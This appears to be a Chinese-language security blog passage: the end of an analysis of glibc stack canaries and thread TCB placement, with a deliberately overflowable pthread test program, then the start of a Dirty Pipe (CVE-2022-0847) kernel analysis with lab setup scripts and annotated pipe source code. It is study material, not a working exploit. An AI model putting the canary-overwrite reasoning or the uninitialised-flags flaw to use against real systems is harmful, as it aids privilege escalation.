   thread pointer points to is unspecified.  Allocate the TCB there.  */
# define TLS_TCB_AT_TP  1
# define TLS_DTV_AT_TP  0

因此 pthread 结构的首个字段为 tcbhead_t header：

// sysdeps\x86_64\nptl\tls.h

typedef struct
{
  void *tcb;    /* Pointer to the TCB.  Not necessarily the
         thread descriptor used by libpthread.  */
  dtv_t *dtv;
  void *self;   /* Pointer to the thread descriptor.  */
  int multiple_threads;
  int gscope_flag;
  uintptr_t sysinfo;
  uintptr_t stack_guard;
  uintptr_t pointer_guard;
  
  ... 
} tcbhead_t;

在结构体 tcbhead_t 中，我们可以看到熟悉的 stack_guard 字段，单个线程的 canary 值就存放在这里。而 tcb 指针和 self 指针，实际指向的都是同一个地址，即 struct pthread 结构体（亦或者是 struct tcbhead_t 本身，这两个结构体地址相同）。

回顾 THREAD_SELF 宏定义，我们不难推断出 %fs 寄存器存放的是 struct pthread 结构体的地址，而 %fs:28h 引用的就是 pthread::tcbhead_t::stack_guard 的地方，与之前 IDA 中显示的一致。

不过不知道为什么要获取 struct pthread 地址得绕这么大弯，得获取其 head 的 self 指针…

这里需要说一下 %fs 寄存器为什么存放的是struct pthread 结构体的地址。看看这个宏定义：

/* Code to initially initialize the thread pointer.  This might need
   special attention since 'errno' is not yet available and if the
   operation can cause a failure 'errno' must not be touched.

   We have to make the syscall for both uses of the macro since the
   address might be (and probably is) different.  */
# define TLS_INIT_TP(thrdescr) \
  ({ void *_thrdescr = (thrdescr);                \
     tcbhead_t *_head = _thrdescr;               \
     int _result;                 \
                        \
     _head->tcb = _thrdescr;                   \
     /* For now the thread descriptor is at the same address.  */       \
     _head->self = _thrdescr;                  \
                        \
     /* It is a simple syscall to set the %fs value for the thread.  */       \
     asm volatile ("syscall"                  \
       : "=a" (_result)               \
       : "0" ((unsigned long int) __NR_arch_prctl),           \
         "D" ((unsigned long int) ARCH_SET_FS),         \
         "S" (_thrdescr)                \
       : "memory", "cc", "r11", "cx");             \
                        \
    _result ? "cannot set %fs base address for thread-local storage" : 0;     \
  })

# define TLS_DEFINE_INIT_TP(tp, pd) void *tp = (pd)

宏定义 TLS_INIT_TP 会调用 SYS_ARCH_SET_FS 系统调用，将 %fs 寄存器的值设置为传入的 pthread 结构体地址。这里也可以看到该宏定义会同步将线程控制块的地址设置进 tcb 指针和 self 指针字段中。

那么何时会调用 TLS_INIT_TP 宏来设置主线程的 TCB 至 %fs 中呢？有两种情况：

在执行 dl_main 函数时，满足某种条件需要提前使用 TLS，于是提早初始化。
在执行 __libc_start_main 函数时，执行其中的 __pthread_initialize_minimal -> __libc_setup_tls 函数调用链。

无论哪种可能，这两种情况都会在创建 canary 前完成。尤其是第二种，几乎贴着创建 canary 步骤。那么这一整个逻辑就都串起来了：

动态链接器在执行 dl_main 函数前，先初始化 _dl_random 随机数。
控制流在创建 Canary 前，执行TLS_INIT_TP 宏，将 %fs 寄存器设置为主线程的线程控制块地址。
控制流在执行 __libc_start_main之中使用 _dl_random 随机数，生成 canary 值，并将其存放在 %fs 寄存器所指定的线程控制块中用于存放 canary 的字段。

3. Canary 读取

Canary 写入主线程 TLS 的流程有了，那么要如何读取呢？在 sysdeps\x86_64\stackguard-macros.h 中有着这样的一段宏定义:

#define STACK_CHK_GUARD \
  ({ uintptr_t x;           \   
     asm ("mov %%fs:%c1, %0" : "=r" (x)     \
    : "i" (offsetof (tcbhead_t, stack_guard))); x; })

因此只要使用 STACK_CHK_GUARD 宏就能读取出当前线程的 canary 值，例如：

if (stack_chk_guard_copy != STACK_CHK_GUARD)
{
    puts ("STACK_CHK_GUARD changed between constructor and do_test");
    return 1;
}

如果关闭了 THREAD_SET_STACK_GUARD 宏，即关闭线程栈保护，那么计算出来的 canary 值会被保留进全局变量 __stack_chk_guard 中：

// __libc_start_main 函数片段

  /* Set up the stack checker's canary.  */
  uintptr_t stack_chk_guard = _dl_setup_stack_chk_guard (_dl_random);
# ifdef THREAD_SET_STACK_GUARD
  THREAD_SET_STACK_GUARD (stack_chk_guard);
# else
  // 这里!
  __stack_chk_guard = stack_chk_guard;
# endif

仍然可以通过 STACK_CHK_GUARD 宏来获取：

// sysdeps\generic\stackguard-macros.h
    
extern uintptr_t __stack_chk_guard;
#define STACK_CHK_GUARD __stack_chk_guard

STACK_CHK_GUARD 宏在 glibc 中几乎找不到使用点，推测这个宏是为 gcc 编译时加入读取 canary 值的操作所做的准备。

4. TCB 位置

a. 主线程

主线程的 TCB 的内存分配过程过于复杂：

一种是在 __libc_start_main -> __pthread_initialize_minimal -> __libc_setup_tls 函数调用链中，调用 __sbrk 函数在堆内存上分配 TLS。
再一种是在 rtld 的 _dl_allocate_tls_storage 函数中调用 mmap 函数来分配 TLS。

不过看上去大部分程序的 TCB 内存分配都会在 rtld 中提前进行，而不会等到走进 user entry 后才开始。随手写了个程序调试了一下，发现主线程 TLS 果然是通过 mmap 函数创建的：

gdb 无法直接读取 %fs 寄存器的值，会读取到一个 0：

因此需要用 gdb 调用 pthread_self 函数来获取当前线程的 TCB 位置，这个函数较为简单：

pthread_t
__pthread_self (void)
{
  return (pthread_t) THREAD_SELF;
}

这里可以看到用户程序从 %fs:28h 处取出的 Canary 与主线程 TCB 中存放的 Canary 一致，验证之前的分析：

结论：主线程 TLS 位置较为随机，想通过修改主线程 TLS 来改主线程 canary 几乎是不可能的。

b. 子线程

要看子线程的 TCB 与 Canary 逻辑，那就得移步进 pthread_create 函数的实现。这个函数位于 nptl\pthread_create.c 中，有 __pthread_create_2_0 和 __pthread_create_2_1 两个实现版本，不过 2.0 是 2.1 的 wrapper，因此我们将目光放在 2.1 版本的实现上。

这里只看有趣的代码片段：

  struct pthread *pd = NULL;
  int err = ALLOCATE_STACK (iattr, &pd);

  [...]

  /* Initialize the TCB.  All initializations with zero should be
   performed in 'get_cached_stack'.  This way we avoid doing this if
   the stack freshly allocated with 'mmap'.  */

#if TLS_TCB_AT_TP
  /* Reference to the TCB itself.  */
  pd->header.self = pd;

  /* Self-reference for TLS.  */
  pd->header.tcb = pd;
#endif

  [...]
      
  /* Copy the stack guard canary.  */
#ifdef THREAD_COPY_STACK_GUARD
  THREAD_COPY_STACK_GUARD (pd);
#endif

首先，pthread_create 会创建线程栈（每个线程都有一个独立的栈），这个栈可以是用先前的缓存（例如重用被终止线程的栈），也可以是 mmap 出的一个新的栈。有趣的是，新线程的 TCB 会在这个线程栈上创建，那这就使得子线程的 TCB 地址对用户来说不再是随机的，因此可以通过子线程的栈溢出来覆写子线程 TCB 的 Canary。

需要注意的是，在 allocate_stack 这个为子线程分配栈的函数中，TCB（pthread 结构体）将会被放置在整个线程栈的栈底，即线程栈的最最最最底部（也就是最最高地址处）存放的是 TCB。

这个可以验证一下，从网上 CV 了一个 pthread 样例稍微改了下，编译调试：

#include
#include
// a simple pthread example 
// compile with -lpthreads

// create the function to be executed as a thread
void *thread(void *ptr)
{
    // tell complier to enable stack canary detection.
    char ch[0x20];
    scanf("%s", ch);
    printf("%s", ch);
}

int main(int argc, char **argv)
{
    // create the thread objs
    pthread_t thread1;
    // start the threads
    pthread_create(&thread1, NULL, *thread, NULL);
    // wait for threads to finish
    pthread_join(thread1, NULL);
    return 0;
}

下个断点在 thread 函数上，然后开跑切换至子线程。此时的线程栈和 TCB 地址如下，可以看到非常的贴近，而且都在同一个内存段上：

之后在线程栈底部找到了这个 Canary，偏移量是 0x878（属实是有点远）：

除了线程栈分配较为有趣以外，下边还有一个 THREAD_COPY_STACK_GUARD宏调用，这个调用会把当前线程的 canary 复制一份进新线程的 TCB 中。注意控制流的基本单位是线程，虽然每个线程的 canary 值都相同，但在验证 canary 时，只会去获取当前 TCB 上存储的 canary 值。也就是说如果以非法手段将子线程的 canary 值改变，那么这种改变不影响其他线程的执行。

整个关于用户层 Canary 机制差不多就是分析的这些内容，这个机制还是比较有趣的。

四、参考

Linux Dirty Pipe CVE-2022-0847 漏洞分析

2022-04-02T16:00:00.000Z

一、简介

Dirty Pipe 漏洞是 Linux 系统中的一个内核提权漏洞，漏洞危害堪比 Dirty COW，但相对于 Dirty COW 来说更加容易利用。

漏洞影响范围：pipe: merge anon_pipe_buf*_ops - linux commit （v5.8-rc1） ~ lib/iov_iter: initialize “flags” in new pipe_buffer（v5.17-rc6）

时间范围大概是 2020/5/21 - 2022/2/21。

二、环境搭建

参照先前的 Linux pwn 环境搭建笔记来搭建出一个带有漏洞的 linux 环境。这里使用的 commit id 为 f6dd975583bd8ce088400648fd9819e4691c8958。

简单贴几个脚本：

几个关键文件夹的位置关系：
linux/busybox-1.34.1/_install：busybox 文件系统位置
linux/myfolder：存放 exp 等需要复制进 VM 的文件

启动 linux 脚本：

#! /bin/bash

# 判断当前权限是否为 root，需要高权限以执行 gef-remote --qemu-mode
user=$(env | grep "^USER" | cut -d "=" -f 2)
if [ "$user" != "root"  ]
  then
    echo "请使用 root 权限执行"
    exit
fi

# 编译 POC
g++ ./myfolder/poc.c -o ./myfolder/poc -static
# 复制文件至 rootfs
cp ./myfolder/* busybox-1.34.1/_install

# 构建 rootfs
pushd busybox-1.34.1/_install
find . | cpio -o --format=newc > ../../rootfs.img
popd

gnome-terminal -e 'gdb -x mygdbinit'

# 启动 qemu
qemu-system-x86_64 \
    -kernel ./arch/x86/boot/bzImage \
    -initrd ./rootfs.img \
    -append "nokaslr" \
    -m 2G \
    -s  \
    -S \
    -nographic -append "console=ttyS0"

gdbinit：

set architecture i386:x86-64
add-symbol-file vmlinux
gef-remote --qemu-mode localhost:1234

# b start_kernel
c

启动 qemu 时报了一个错：

这是因为先前启动 qemu 时忘记指定内存 -m 了，加个 -m 2G 分配 2G 的内存给 qemu 即可。

三、代码浅析

在分析漏洞之前，我们需要熟悉一下该漏洞所涉及的代码片段，也算是顺便熟悉一下 pipe 机制的实现。

这里将涉及 commit f6dd97 中的几个文件：

include/linux/pipe_fs_i.h
fs/pipe.c
fs/splice.c
lib/iov_iter.c
…

1. pipe 相关结构体

a. pipe_inode_info

pipe_inode_info 结构体存放了 pipe 机制所要用到的字段：

/**
 *  struct pipe_inode_info - a linux kernel pipe
 *  @mutex: mutex protecting the whole thing
 *  @rd_wait: reader wait point in case of empty pipe
 *  @wr_wait: writer wait point in case of full pipe
 *  @head: The point of buffer production
 *  @tail: The point of buffer consumption
 *  @max_usage: The maximum number of slots that may be used in the ring
 *  @ring_size: total number of buffers (should be a power of 2)
 *  @tmp_page: cached released page
 *  @readers: number of current readers of this pipe
 *  @writers: number of current writers of this pipe
 *  @files: number of struct file referring this pipe (protected by ->i_lock)
 *  @r_counter: reader counter
 *  @w_counter: writer counter
 *  @fasync_readers: reader side fasync
 *  @fasync_writers: writer side fasync
 *  @bufs: the circular array of pipe buffers
 *  @user: the user who created this pipe
 **/
struct pipe_inode_info {
    struct mutex mutex;
    wait_queue_head_t rd_wait, wr_wait;
    unsigned int head;
    unsigned int tail;
    unsigned int max_usage;
    unsigned int ring_size;
    unsigned int readers;
    unsigned int writers;
    unsigned int files;
    unsigned int r_counter;
    unsigned int w_counter;
    struct page *tmp_page;
    struct fasync_struct *fasync_readers;
    struct fasync_struct *fasync_writers;
    struct pipe_buffer *bufs;
    struct user_struct *user;
};

这个结构体麻雀虽小五脏俱全，该有的都有，包括等待写入/读取该管道的队列、管道大小、存放具体内存的指针数组等等。

pipe 存放数据使用的是环形队列，即在定长大小的数据环（pipe buf ring）上，尽可能的存储数据；因此这里需要简单强调一下一些字段的用途：

head：标注队列首部的索引，注意这里的索引单位是一个 pipe_buffer。head 为接下来要写入的位置。

tail：标注队列尾部的索引，tail 为接下来要读取的位置。

上面两个字段的关系有点类似这样：

low addr                                 high addr
+--------------------------------------------+
|  |  |  |  |  |  |  | >|//|//|//|> |  |  |  |
+--------------------------------------------+
                       A   ---->   A
                       |           |
                     tail         head

无论是 head 还是 tail，它们都指向没写满的 pipe_buffer（有点类似 STL 的 end 方法）。

max_usage：最大可用的 pipe_buffer 个数，这个字段约束了整个 pipe 所能容纳的数据大小。
ring_size：当前已分配的 pipe_buffer 个数，注意该值必须为2的幂。
files：结构体 file 引用至该管道的个数。这个有点类似某个管道被 dup 出多个 fd 一样。
tmp_page：缓存先前被释放的 page，这个 page 可以被重用以降低重分配开销。
bufs：实际存放多个 pipe_buffer 的数组，在设计上我们需要将该一维数组看作一个环。

b. pipe_buffer

接下来我们简单深入一下结构体 pipe_buffer，该结构体存放着实际管道中存放的数据：

/**
 *  struct pipe_buffer - a linux kernel pipe buffer
 *  @page: the page containing the data for the pipe buffer
 *  @offset: offset of data inside the @page
 *  @len: length of data inside the @page
 *  @ops: operations associated with this buffer. See @pipe_buf_operations.
 *  @flags: pipe buffer flags. See above.
 *  @private: private data owned by the ops.
 **/
struct pipe_buffer {
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
};

这个结构体存放了包括页引用、页偏移、数据大小等关键信息。这里的 flag 共有这几种：

// include/linux/pipe_fs_i.h
#define PIPE_BUF_FLAG_LRU       0x01    /* page is on the LRU */
#define PIPE_BUF_FLAG_ATOMIC    0x02    /* was atomically mapped */
#define PIPE_BUF_FLAG_GIFT      0x04    /* page is a gift */
#define PIPE_BUF_FLAG_PACKET    0x08    /* read() as a packet */
#define PIPE_BUF_FLAG_CAN_MERGE 0x10    /* can merge buffers */

我们可以暂时不用去管这几种 flag 具体的意思。

c. iov_iter

结构体 iov_iter 用于迭代那种被分为多个页的数据，换句话说，该结构体将用于迭代一个个页面。其结构体如下所示：

enum iter_type {
    /* iter types */
    ITER_IOVEC = 4,
    ITER_KVEC = 8,
    ITER_BVEC = 16,
    ITER_PIPE = 32,    // 表示正在迭代的数据是位于 pipe 中的
    ITER_DISCARD = 64,
};

struct iov_iter {
    /*
     * Bit 0 is the read/write bit, set if we're writing.
     * Bit 1 is the BVEC_FLAG_NO_REF bit, set if type is a bvec and
     * the caller isn't expecting to drop a page reference when done.
     */
    unsigned int type;
    size_t iov_offset;
    size_t count;
    union {
        const struct iovec *iov;
        const struct kvec *kvec;
        const struct bio_vec *bvec;
        struct pipe_inode_info *pipe;
    };
    union {
        unsigned long nr_segs;
        struct {
            unsigned int head;
            unsigned int start_head;
        };
    };
};

其中，一些字段的意义如下：

type：表示当前迭代的数据是来自于什么结构，例如：
- ITER_PIPE 表示当前迭代的数据为某个 pipe 中的页数据
- ITER_DISCARD 表示写入当前 iov_iter 的数据全部丢弃。
后续针对 iov_iter 做内存读写时，会根据这个 type 来执行不同类型的内存读写操作。
iov_offset：当前所迭代到 page 的相对偏移，读写将从该 page 的这个相对偏移开始。
cout：可读写的数组字节大小

2. pipe_read 函数

pipe_read 函数位于 fs/pipe.c 中，当内核需要从某个管道中读取数据时便会调用该函数：

const struct file_operations pipefifo_fops = {
    .open             = fifo_open,
    .llseek           = no_llseek,
    .read_iter        = pipe_read,     // read
    .write_iter       = pipe_write,    // write
    .poll             = pipe_poll,
    .unlocked_ioctl   = pipe_ioctl,
    .release          = pipe_release,
    .fasync           = pipe_fasync,
};

首先，该函数声明如下：

1 2	static ssize_t pipe_read(struct kiocb iocb, struct iov_iter to)

这些结构体我们可以不用记住，只需简单知道：

iocb：中存放着获取当前 pipe 结构体的指针
to：从管道读出来的数据将要写入的地方，iov_iter 迭代器类型。

接下来，内核从 to 中获取待读取的大小，并从 iocb 中获取 pipe_inode_info 结构体；如果待读取大小为 0 则直接返回：

size_t total_len = iov_iter_count(to);
struct file *filp = iocb->ki_filp;
struct pipe_inode_info *pipe = filp->private_data;
bool was_full, wake_next_reader = false;
ssize_t ret;

/* Null read succeeds. */
if (unlikely(total_len == 0))
    return 0;

ret = 0;
__pipe_lock(pipe);

接下来，kernel 尝试判断 pipe 是否已满，如果满了则设置 was_full 标志：

1	was_full = pipe_full(pipe->head, pipe->tail, pipe->max_usage);

虽然这个标志对我们理解主要逻辑没有太大的影响，但这里提起它是为了看看 pipe 是如何判断是否已满的：

/**
 * pipe_occupancy - Return number of slots used in the pipe
 * @head: The pipe ring head pointer
 * @tail: The pipe ring tail pointer
 */
static inline unsigned int pipe_occupancy(unsigned int head, unsigned int tail)
{
    return head - tail;
}

/**
 * pipe_full - Return true if the pipe is full
 * @head: The pipe ring head pointer
 * @tail: The pipe ring tail pointer
 * @limit: The maximum amount of slots available.
 */
static inline bool pipe_full(unsigned int head, unsigned int tail,
                 unsigned int limit)
{
    return pipe_occupancy(head, tail) >= limit;
}

可以看到，如果 pipe->head - pipe->tail >= pipe->max_usage，则说明 pipe 数据区已满。相对的，判断 pipe 是否为空也很简单：

/**
 * pipe_empty - Return true if the pipe is empty
 * @head: The pipe ring head pointer
 * @tail: The pipe ring tail pointer
 */
static inline bool pipe_empty(unsigned int head, unsigned int tail)
{
    return head == tail;
}

回到 pipe_read 函数，接下来 kernel 将循环读取 pipe：

for (;;) {
    unsigned int head = pipe->head;
    unsigned int tail = pipe->tail;
    // 注意 pipe->ring_size 为 2的幂，因此 ring_size-1 转成二进制为 0b1111...111
    unsigned int mask = pipe->ring_size - 1;
    // 如果管道中存在数据
    if (!pipe_empty(head, tail)) {
        // 获取 head 所对应的 pipe_buffer，注意 head 的范围可以大于 max_usage，因为整个 pipe_buffer 的设计就是把它当作一个环
        struct pipe_buffer *buf = &pipe->bufs[tail & mask];
        // 获取当前读取的 buf 数据大小
        size_t chars = buf->len;
        size_t written;
        int error;
    
        // 如果当前可读取的 buf 大小大于 需要读入的大小，则截断
        if (chars > total_len)
            chars = total_len;
        // 调用 pipe_buf 的 confirm 方法，确保 pipe buffer 中的数据有效
        error = pipe_buf_confirm(pipe, buf);
        if (error) {
            if (!ret)
                ret = error;
            break;
        }
    
        // 将当前 pipe buffer 所对应的内存页，写入 to 中
        written = copy_page_to_iter(buf->page, buf->offset, chars, to);
        // 如果写入大小 < 可写大小，则说明在写入数据时出现不可恢复的错误，直接返回
        if (unlikely(written < chars)) {
            if (!ret)
                ret = -EFAULT;
            break;
        }
        // 一轮读取完成，如果带读取大小仍然不为0，则准备继续循环读取
        ret += chars;
        buf->offset += chars;
        buf->len -= chars;

        /* Was it a packet buffer? Clean up and exit */
        // 若引用该 pipe 的 fd 设置了 O_DIRECT 标志，这个标志可以在 pipe_write 函数中看看是怎么使用的
        if (buf->flags & PIPE_BUF_FLAG_PACKET) {
            total_len = chars;
            buf->len = 0;
        }
        // 如果当前 pipe buffer 已经全部读取完成，则更新 tail 至下一个 pipe buffer
        if (!buf->len) {
            pipe_buf_release(pipe, buf);
            spin_lock_irq(&pipe->rd_wait.lock);
            tail++;
            pipe->tail = tail;
            spin_unlock_irq(&pipe->rd_wait.lock);
        }
        total_len -= chars;
        // 如果正常读取完，则直接返回
        if (!total_len)
            break;    /* common path: read succeeded */
        // 如果还需要读取数据，并且管道里确实还有数据，则循环读取
        if (!pipe_empty(head, tail))    /* More to do? */
            continue;
    }

    if (!pipe->writers)
        break;
    if (ret)
        break;
    if (filp->f_flags & O_NONBLOCK) {
        ret = -EAGAIN;
        break;
    }
    __pipe_unlock(pipe);

    /*
         * We only get here if we didn't actually read anything.
         * ...
         */
    ...;
}
...;

return ret;

3. copy_page_to_iter 相关

从函数 pipe_buffer 的注释中可以得知大致的读取 pipe 的流程。其中 copy_page_to_iter 函数会根据变量 to 的内部字段 type 来选择执行不同的操作：

不过总体上的功能，还是将传入的 page 复制进 iov_iter 所指向的位置。

// include/linux/uio.h
static __always_inline __must_check
size_t copy_to_iter(const void *addr, size_t bytes, struct iov_iter *i)
{
    if (unlikely(!check_copy_size(addr, bytes, true)))
        return 0;
    else
        return _copy_to_iter(addr, bytes, i);
}

// lib/iov_iter.c
size_t copy_page_to_iter(struct page *page, size_t offset, size_t bytes,
             struct iov_iter *i)
{
    // 判断数据读写是否越界，通常这个 check 肯定是可以通过的
    if (unlikely(!page_copy_sane(page, offset, bytes)))
        return 0;
    if (i->type & (ITER_BVEC|ITER_KVEC)) {
        void *kaddr = kmap_atomic(page);
        size_t wanted = copy_to_iter(kaddr + offset, bytes, i);
        kunmap_atomic(kaddr);
        return wanted;
    } else if (unlikely(iov_iter_is_discard(i)))
        return bytes;
    else if (likely(!iov_iter_is_pipe(i))) 
        return copy_page_to_iter_iovec(page, offset, bytes, i);
    else // (i->type & ~(READ | WRITE)) == ITER_PIPE
        return copy_page_to_iter_pipe(page, offset, bytes, i);
}

这里我们只关注当 to 也为一个 pipe 时，数据是如何复制的，即 copy_page_to_iter_pipe 函数。整个函数其实很短：

static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
             struct iov_iter *i)
{
    // 获取待写入的 pipe 结构体
    struct pipe_inode_info *pipe = i->pipe;
    struct pipe_buffer *buf;
    // 获取待写入的 pipe 结构体的一些信息，例如 head、tail等等 
    unsigned int p_tail = pipe->tail;
    unsigned int p_mask = pipe->ring_size - 1;
    unsigned int i_head = i->head;
    size_t off;

    // 这里是在做一些 check
    if (unlikely(bytes > i->count))
        bytes = i->count;

    if (unlikely(!bytes))
        return 0;

    if (!sanity(i))
        return 0;
 
    // 获取待写入的相对偏移位置
    off = i->iov_offset;
    // 获取待接收数据的 pipe buf
    buf = &pipe->bufs[i_head & p_mask];
    if (off) {
        if (offset == off && buf->page == page) {
            /* merge with the last one */
            buf->len += bytes;
            i->iov_offset += bytes;
            goto out;
        }
        i_head++;
        buf = &pipe->bufs[i_head & p_mask];
    }
    // 如果待写入的管道已满，则直接返回
    if (pipe_full(i_head, p_tail, pipe->max_usage))
        return 0;

    buf->ops = &page_cache_pipe_buf_ops;
    // 增加该页的 refcount
    get_page(page);
    buf->page = page;   // 直接引用已有的页
    buf->offset = offset;
    buf->len = bytes;

    pipe->head = i_head + 1;
    i->iov_offset = offset + bytes;
    i->head = i_head;
out:
    i->count -= bytes;
    return bytes;
}

简单讲下其中的关键：对于 recv pipe buf 来说，当有新的 page 数据复制到 recv pipe buf 上时，recv pipe buf 将直接引用该页，并记录下当前复制的 offset、len 等等，以降低性能开销。如果每次复制的都是不同的页，那 recv pipe bufs 上存放的就是不同页的引用，其中每页的 offset 和 len 可能不会饱和。

注意：由于这里 pipe buf 是直接引用其他页，因此在 page_write 处必须确保新传来的数据不会写入这样的页面中，而这种保证就依赖于 MERGE 标志。

在这里我们可以看到一个有意思的事情：虽然 recv pipe buf 结构体上的众多字段都被重新赋值，但有一个字段却被遗漏了，那就是 flags 字段！

4. copy_to_iter 相关

除了 pipe_read 调用 copy_page_to_iter 函数，进而调用到 copy_page_to_iter 函数来传递数据至 pipe 以外，copy_to_iter 函数也可以用于 pipe 的数据传递：

static __always_inline __must_check
size_t copy_to_iter(const void *addr, size_t bytes, struct iov_iter *i)
{
    if (unlikely(!check_copy_size(addr, bytes, true)))
        return 0;
    else
        return _copy_to_iter(addr, bytes, i);
}

size_t _copy_to_iter(const void *addr, size_t bytes, struct iov_iter *i)
{
    const char *from = addr;
    if (unlikely(iov_iter_is_pipe(i))) // pipe case
        return copy_pipe_to_iter(addr, bytes, i);
    if (iter_is_iovec(i))
        might_fault();
    iterate_and_advance(i, bytes, v,
        copyout(v.iov_base, (from += v.iov_len) - v.iov_len, v.iov_len),
        memcpy_to_page(v.bv_page, v.bv_offset,
                   (from += v.bv_len) - v.bv_len, v.bv_len),
        memcpy(v.iov_base, (from += v.iov_len) - v.iov_len, v.iov_len)
    )

    return bytes;
}

copy_to_iter 函数有很多个调用点，因此大概率存在某个调用点是通过 copy_to_iter 函数来向 pipe 中写入数据。这样一来控制流变可以通过 copy_to_iter-> _copy_to_iter -> copy_pipe_to_iter 来调用到真正执行数据拷贝的操作：

static size_t copy_pipe_to_iter(const void *addr, size_t bytes,
                struct iov_iter *i)
{
    // 获取 pipe 结构体
    struct pipe_inode_info *pipe = i->pipe;
    unsigned int p_mask = pipe->ring_size - 1;
    unsigned int i_head;
    size_t n, off;
    // 执行 check
    if (!sanity(i))
        return 0;

    /*  从代码中可以推测该函数的功能：
        1. 获取可写入管道的大小（管道可能不够大）
        2. 准备待写入管道的一些 pipe_buf
        3. 获取当前管道的 head 位置
        4. 获取当前 pipe 可写页位置的相对偏移 off
    */
    // n 为待写入数据字节大小
    bytes = n = push_pipe(i, bytes, &i_head, &off);
    // 如果没有数据需要写入，则直接返回。通常这个分支不大可能会触发。
    if (unlikely(!n))
        return 0;
    // 循环写入管道，直到待写入的数据全部写完。每写一次时，要么写完一整页，要么没写完一页就直接退出
    do {
        // 获取单次可写入的大小
        size_t chunk = min_t(size_t, n, PAGE_SIZE - off);
        memcpy_to_page(pipe->bufs[i_head & p_mask].page, off, addr, chunk);
        i->head = i_head;
        i->iov_offset = off + chunk;
        n -= chunk;
        addr += chunk;
        off = 0;
        i_head++;
    } while (n);
    // 修改当前 iov_iter 待写入的大小
    i->count -= bytes;
    return bytes;
}

接下来我们再来看看函数 push_pipe，从上面的注解我们也可得知这个函数是比较重要的：

static size_t push_pipe(struct iov_iter *i, size_t size,
            int *iter_headp, size_t *offp)
{
    // 获取接收数据的 pipe
    struct pipe_inode_info *pipe = i->pipe;
    unsigned int p_tail = pipe->tail;
    unsigned int p_mask = pipe->ring_size - 1;
    unsigned int iter_head;
    size_t off;
    ssize_t left;
    // 一些常规 check 暂且不表
    if (unlikely(size > i->count))
        size = i->count;
    if (unlikely(!size))
        return 0;

    left = size;
    /* data_start 获取 pipe 的 head & 起始 offset。
       这个函数用于过滤 head 指向上一个未被分配的 pipe buf 或者 offset == PAGE_SIZE 的情况 */
    data_start(i, &iter_head, &off);
    *iter_headp = iter_head;
    *offp = off;
    // 如果当前是从某个页的中间位置开始写
    if (off) {
        // 判断这剩余半页够不够写
        left -= PAGE_SIZE - off;
        // 要是够写则直接返回
        if (left <= 0) {
            pipe->bufs[iter_head & p_mask].len += size;
            return size;
        }
        // 如果不够写则先把该可写的半页，扩充为可写的整页
        pipe->bufs[iter_head & p_mask].len = PAGE_SIZE;
        iter_head++;
    }
    // 到这里时，则循环扩充页
    while (!pipe_full(iter_head, p_tail, pipe->max_usage)) {
        // 循环获取 pipe_buffer，并初始化 pipe_buffer 结构体上的数据
        struct pipe_buffer *buf = &pipe->bufs[iter_head & p_mask];
        struct page *page = alloc_page(GFP_USER);
        if (!page)
            break;

        buf->ops = &default_pipe_buf_ops;
        buf->page = page;
        buf->offset = 0;
        buf->len = min_t(ssize_t, left, PAGE_SIZE);
        left -= buf->len;
        /* !!! 需要注意的是，这里没有对 buf 的 flag 字段初始化！因此这里的 flag 字段将沿用旧的 pipe_buffer 的 flag*/
        iter_head++;
        pipe->head = iter_head;

        if (left == 0)
            return size;
    }
    return size - left;
}

从 push_pipe 函数中我们可以看到，当 kernel 循环扩充 pipe_buffer 上的页时，这里也并没有初始化 pipe_buffer 的 flag 标志！又因为 pipe_buffer 在设计上便是一个环，因此在扩孔 pipe_buffer 时，这里也将重用先前 pipe_buffer 所设置的 flag。

这里简单总结一下 copy_page_to_iter 函数与 copy_to_iter 函数在复制数据进 pipe 时 所实现的差异：
前者是在一个完整 page 上，将数据复制给 pipe。因此 pipe buf 只需直接引用该页，并记录下 offset 和 len，即可完成复制操作。
后者不保证源数据在完整 page 上，而是提供了 addr 和 len，因此 pipe buf 需要自己准备存放数据的 page。

5. pipe_write 函数

这次我们只关注最精华的两部分，首先是 页合并：

head = pipe->head;
was_empty = pipe_empty(head, pipe->tail);
chars = total_len & (PAGE_SIZE-1);
if (chars && !was_empty) {
    unsigned int mask = pipe->ring_size - 1;
    struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
    int offset = buf->offset + buf->len;

    if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
        offset + chars <= PAGE_SIZE) {
        ret = pipe_buf_confirm(pipe, buf);
        if (ret)
            goto out;

        ret = copy_page_from_iter(buf->page, offset, chars, from);
        if (unlikely(ret < chars)) {
            ret = -EFAULT;
            goto out;
        }

        buf->len += ret;
        if (!iov_iter_count(from))
            goto out;
    }
}

如果说当前 pipe buf 中已经存在数据，并且本次待写入的数据可以被该 pipe buf 剩余空间所容纳，则本次写入的数据将直接写入该 pipe buf 中，与先前的 pipe buf 数据合并。这个合并操作需要 pipe buf 有 PIPE_BUF_FLAG_CAN_MERGE 标志，该标志只要 pipe_write 所对应的 fd 没有设置 O_DIRECT 标志即可自动设置。

其次是正常的页面写入逻辑：

for (;;) {
    // 如果一个管道没有读者，则说明管道已经被破坏，生成 SIGPIPE 信号
    if (!pipe->readers) {
        send_sig(SIGPIPE, current, 0);
        if (!ret)
            ret = -EPIPE;
        break;
    }
    // 尝试循环往管道内写入数据
    head = pipe->head;
    if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
        unsigned int mask = pipe->ring_size - 1;
        struct pipe_buffer *buf = &pipe->bufs[head & mask];
        struct page *page = pipe->tmp_page;
        int copied;
        // 获取先前被释放但是缓存起来的 tmp_page。
        // 如果存在 tmp_page 则在向 pipe buf 写入数据时就可直接重用而无需分配
        if (!page) {
            page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
            if (unlikely(!page)) {
                ret = ret ? : -ENOMEM;
                break;
            }
            pipe->tmp_page = page;
        }

        /* Allocate a slot in the ring in advance and attach an
             * empty buffer.  If we fault or otherwise fail to use
             * it, either the reader will consume it or it'll still
             * be there for the next write.
             */
        spin_lock_irq(&pipe->rd_wait.lock);

        head = pipe->head;
        if (pipe_full(head, pipe->tail, pipe->max_usage)) {
            spin_unlock_irq(&pipe->rd_wait.lock);
            continue;
        }

        pipe->head = head + 1;
        spin_unlock_irq(&pipe->rd_wait.lock);

        /* Insert it into the buffer array */
        // 往新的 pipe buf 中写入数据
        buf = &pipe->bufs[head & mask];
        buf->page = page;
        buf->ops = &anon_pipe_buf_ops; // 设置匿名管道操作
        buf->offset = 0;
        buf->len = 0;
